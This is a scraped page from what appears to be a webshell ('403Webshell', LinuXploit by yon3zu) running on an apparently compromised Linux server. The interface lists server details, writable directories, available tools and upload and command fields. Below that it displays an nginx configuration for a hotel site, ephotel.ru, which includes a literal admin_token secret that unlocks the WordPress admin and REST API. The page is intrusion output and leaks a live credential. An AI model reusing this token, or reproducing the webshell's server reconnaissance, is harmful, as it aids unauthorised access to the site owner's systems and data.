403Webshell
Server IP : 185.252.147.100  /  Your IP : 216.73.216.196
Web Server : nginx/1.27.3
System : Linux mitrofanov.ru 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64
User : mitr ( 1000)
PHP Version : 8.2.29
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /www/sites/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /www/sites/ephotel.conf
server {

      listen 80;
      listen [::]:80;
            listen 443 quic;
      listen 443 ssl;
      listen [::]:443 ssl;
      listen [::]:443 quic;

      server_name             ephotel.ru www.ephotel.ru;

     ssl_certificate         /etc/letsencrypt/live/ephotel.ru/fullchain.pem;
     ssl_certificate_key     /etc/letsencrypt/live/ephotel.ru/privkey.pem;
     ssl_trusted_certificate /etc/letsencrypt/live/ephotel.ru/chain.pem;

      set $https_redirect 0;
      if ($server_port = 80) { set $https_redirect 1; }
      if ($host ~ '^www\.') { set $https_redirect 1; }
      if ($https_redirect = 1) {
      return 301 https://SERVERNAME$request_uri;
      }

      #access_log syslog:server=unix:/dev/log,tag=rudder,nohostname main;

      access_log off;

#      include /www/nconf/bot_out;
      include /www/nconf/errors_beautify;

      root    /www/html/ephotel.ru/wordpress;


      more_set_headers  'X-Robots-Tag: $robots';

      include /www/nconf/common;

            set $admin_token '_cg[4c5"75^8fb6=m\e#qc5]113';

      location = /adminka {
            add_header Set-Cookie "admin_token=$admin_token; Path=/";
            return 302 "/wp-admin/";
      }

      include /www/nconf/wordpress;
      include /www/nconf/wordpress_sitemap;

      location / {

            limit_except GET HEAD POST { deny all; }

            if ($args ~ "^author=\d") { return 403;}

            include /www/nconf/headers_cors;
            include /www/nconf/headers;

            add_header Content-Security-Policy  "default-src 'self' https: data: 'unsafe-inline'; frame-src 'self' *.yandex.ru yandex.ru *.reservationsteps.ru reservationsteps.ru; frame-ancestors 'self'; form-action 'self'; script-src 'self' blob: 'unsafe-inline' 'unsafe-eval' *.trustindex.io *.reservationsteps.ru *.yandex.ru *.yandex.net yastatic.net ajax.googleapis.com *.googletagmanager.com *.gstatic.com *.jsdelivr.net *.webvisor.org;" always;

            location ~ ^[^.]*$ {

                  fastcgi_param SCRIPT_FILENAME $document_root/index.php;
                  limit_req zone=main ;
                  include  /www/nconf/fcgi;

                  #fastcgi_cache     allcache;
                  #include  /www/nconf/fcache;
                  #fastcgi_cache_valid 404 502 503 5m;
                  #fastcgi_cache_valid 200 301 302 10h;
            }



            location ^~ /wp-json/ {

                  if ($cookie_admin_token = "") {
                  return 403;
                  }

                  limit_req zone=flood burst=200 nodelay ;
                  limit_except GET HEAD POST OPTIONS { deny all; }
                  fastcgi_param SCRIPT_FILENAME $document_root/index.php;
                  include  /www/nconf/fcgi;
            }

            location ~ \.php$ {
                  return 444;

            }

      }


}


Youez - 2016 - github.com/yon3zu
LinuXploit